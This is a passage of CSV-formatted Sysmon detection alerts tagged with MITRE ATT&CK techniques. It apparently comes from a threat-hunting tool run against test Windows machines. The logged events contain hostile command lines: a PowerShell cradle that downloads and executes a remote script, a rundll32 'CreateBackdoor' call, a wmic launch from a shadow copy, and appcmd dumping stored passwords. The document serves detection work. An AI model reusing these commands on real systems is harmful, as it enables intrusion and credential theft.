<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-0010546E0C00</Data>
<Data Name=""ProcessId"">2356</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1223] Compiled HTML File,1564126754.409237,2019-07-26T11:39:14.409237+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\hh.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-26T07:39:14.375565Z"">
</TimeCreated>
<EventRecordID>4348</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5924"" ThreadID=""6056"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-26 07:39:14.345</Data>
<Data Name=""ProcessGuid"">747F3D96-AE22-5D3A-0000-001096B24E00</Data>
<Data Name=""ProcessId"">1504</Data>
<Data Name=""Image"">C:\Windows\hh.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft® HTML Help Executable</Data>
<Data Name=""Product"">HTML Help</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\hh.exe&quot; C:\Users\IEUser\Desktop\Fax Record N104F.chm</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-ABD5-5D3A-0000-0020EB990F00</Data>
<Data Name=""LogonId"">0xf99eb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C</Data>
<Data Name=""ParentProcessGuid"">747F3D96-ABD7-5D3A-0000-001012661000</Data>
<Data Name=""ParentProcessId"">4940</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.195377Z"">
</TimeCreated>
<EventRecordID>243534</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.993</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-0010B9662000</Data>
<Data Name=""ProcessId"">7420</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.195377Z"">
</TimeCreated>
<EventRecordID>243534</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.993</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-0010B9662000</Data>
<Data Name=""ProcessId"">7420</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.195377Z"">
</TimeCreated>
<EventRecordID>243534</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.993</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-0010B9662000</Data>
<Data Name=""ProcessId"">7420</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.143393,2019-05-27T05:29:19.143393+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.143393Z"">
</TimeCreated>
<EventRecordID>5949</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.103</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001066B5FF00</Data>
<Data Name=""ProcessId"">2796</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1564434679.865791,2019-07-30T01:11:19.865791+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (&quot;C:\Windows\System32\wscript.exe&quot; /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt) and Parent Image :C:\Windows\SysWOW64\rundll32.exe , Parent CommandLine (&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,) in directory : ( C:\Users\IEUser\AppData\Local\Temp\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:19.098105Z"">
</TimeCreated>
<EventRecordID>4865</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:19.010</Data>
<Data Name=""ProcessGuid"">747F3D96-60F7-5D3F-0000-00106F2F5600</Data>
<Data Name=""ProcessId"">6160</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\wscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\wscript.exe&quot; /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
<Data Name=""ParentProcessId"">4884</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1074] Data Staged - Process,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.215719Z"">
</TimeCreated>
<EventRecordID>4910</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.170</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ProcessId"">5816</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.215719Z"">
</TimeCreated>
<EventRecordID>4910</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.170</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ProcessId"">5816</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) ran process C:\Windows\System32\mshta.exe and initiated a network connection from hostname ( IEWIN7..home ) and IP ( 10.0.2.15 ) to hostname ( aka105.inwitelecom.net ) , IP ( 105.73.6.105 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:33:01.141798Z"">
</TimeCreated>
<EventRecordID>4132</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3628"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 06:58:40.721</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7..home</Data>
<Data Name=""SourcePort"">49705</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">105.73.6.105</Data>
<Data Name=""DestinationHostname"">aka105.inwitelecom.net</Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T17:26:09.437896Z"">
</TimeCreated>
<EventRecordID>1019</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 17:26:09.417</Data>
<Data Name=""ProcessGuid"">365ABB72-D7B1-5CE6-0000-00102CD76D00</Data>
<Data Name=""ProcessId"">2240</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">D:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
